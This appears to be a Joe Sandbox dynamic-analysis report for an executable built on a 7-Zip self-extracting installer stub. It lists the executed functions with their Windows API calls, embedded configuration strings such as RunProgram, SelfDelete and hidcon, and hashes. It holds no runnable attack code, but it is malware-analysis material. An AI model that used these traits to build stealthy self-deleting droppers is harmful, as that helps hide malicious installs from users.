Execution Coverage:	18.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.4%
Total number of Nodes:	1626
Total number of Limit Nodes:	16

Executed Functions

Function 00405721 Relevance: 231.1, APIs: 93, Strings: 38, Instructions: 1811keyboardwindowCOMMON

Download Yara Rule

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734

Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83

GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2

Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC

Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434

_wtol.MSVCRT ref: 00405825
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
_wtol.MSVCRT ref: 00405A25
??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
wsprintfW.USER32 ref: 00405D2A

Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E

Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D

_wtol.MSVCRT ref: 00405F6B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
CoInitialize.OLE32(00000000), ref: 004062F2
_wtol.MSVCRT ref: 00406338
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
GetKeyState.USER32(00000010), ref: 004063BE
??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
_wtol.MSVCRT ref: 0040686C
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53

Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77

Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF

??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253

Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50

Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64

??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F

Strings

amd64, xrefs: 004068EB
sfxelevation, xrefs: 004058BD, 0040606A
" -, xrefs: 0040606F
waitall, xrefs: 00406742
sfxversion, xrefs: 0040585C
SetEnvironment, xrefs: 004061A1, 004061A9, 0040623A
InstallPath, xrefs: 004062FC
del, xrefs: 004068A1
AutoInstall, xrefs: 004063F0, 0040644B, 004067B0
7-Zip SFX, xrefs: 00406D53
7zSfxString%d, xrefs: 00405D24
SelfDelete, xrefs: 00405F14, 00406CD9
Shortcut, xrefs: 00406C04
setup.exe, xrefs: 004066C9, 004066CE, 00406729
GUIMode, xrefs: 00405E8E
ExecuteParameters, xrefs: 00406964
bpt, xrefs: 00405F7C
OverwriteMode, xrefs: 00405E4A
hidcon, xrefs: 004067E7
x64, xrefs: 004068FE
RunProgram, xrefs: 00406383, 0040649A, 004064A8
shc, xrefs: 00406881
GUIFlags, xrefs: 00405EB1
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406D58
ExecuteFile, xrefs: 0040637E, 00406476, 00406484
BeginPrompt, xrefs: 0040638E
sfxconfig, xrefs: 00405A8A, 00405C55
sfxwaitall, xrefs: 004058A1
forcenowait, xrefs: 00406829
7ZipSfx.%03x, xrefs: 0040656E
x86, xrefs: 004068C5
nowait, xrefs: 00406805
FinishMessage, xrefs: 00406C73
MiscFlags, xrefs: 00405ED4
Delete, xrefs: 00406C2C
i386, xrefs: 004068D8
HelpText, xrefs: 00406279
BeginPromptTimeout, xrefs: 00405F95, 00406325

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
API String ID: 1141480454-1804565692
Opcode ID: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
Opcode Fuzzy Hash: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

Function 00401815 Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
Opcode Fuzzy Hash: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

Function 0040236F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
GetProcAddress.KERNEL32(00000000), ref: 00402386
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394

Strings

GetNativeSystemInfo, xrefs: 00402375
kernel32, xrefs: 0040237A

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: AddressInfoLibraryLoadNativeProcSystem
String ID: GetNativeSystemInfo$kernel32
API String ID: 2103483237-3846845290
Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

Function 00403387 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
SetLastError.KERNEL32(00000010), ref: 004033AA

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D

Function 004011D1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
SendMessageW.USER32(00008001,00000000,?), ref: 00401246

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

Function 00403400 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7

Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4

Strings

SetEnvironment, xrefs: 00403613
{\rtf, xrefs: 00403584, 00403599
0VA, xrefs: 0040363B, 00403641, 00403648, 00403651

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@
String ID: 0VA$SetEnvironment${\rtf
API String ID: 613200358-2390373888
Opcode ID: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
Opcode Fuzzy Hash: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49

Function 00404F67 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00404F8B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
ShellExecuteExW.SHELL32(?), ref: 0040500A
WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
CloseHandle.KERNEL32(00406A69), ref: 0040502B
??3@YAXPAX@Z.MSVCRT(?), ref: 00405032

Strings

$gA, xrefs: 00404FBE

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
String ID: $gA
API String ID: 2700081640-3949116232
Opcode ID: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
Opcode Fuzzy Hash: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

Function 00401D21 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
DispatchMessageW.USER32(?), ref: 00401D73
KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83

Strings

Static, xrefs: 00401D44

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

Function 004036F1 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
Opcode Fuzzy Hash: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

Function 0040F227 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040F230
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1

Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E

Strings

pmA, xrefs: 0040F2EB
{D@, xrefs: 0040F290, 0040F2A7

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@$H_prolog
String ID: pmA${D@
API String ID: 3431946709-901781089
